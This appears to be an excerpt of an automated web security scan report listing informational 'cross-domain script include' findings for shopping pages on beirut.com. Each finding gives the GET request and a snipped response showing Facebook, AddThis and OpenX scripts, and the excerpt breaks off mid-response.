Date: Tue, 25 Jan 2011 08:58:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.642. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:58:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.643. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:59:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.644. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:04:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.645. http://www.beirut.com/Shopping/Clothing-Accessories/194367784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:02:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.646. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:22:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.647. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:34:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.648. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.649. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:36:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.650. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:09:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.651. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:51:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.652. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.653. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
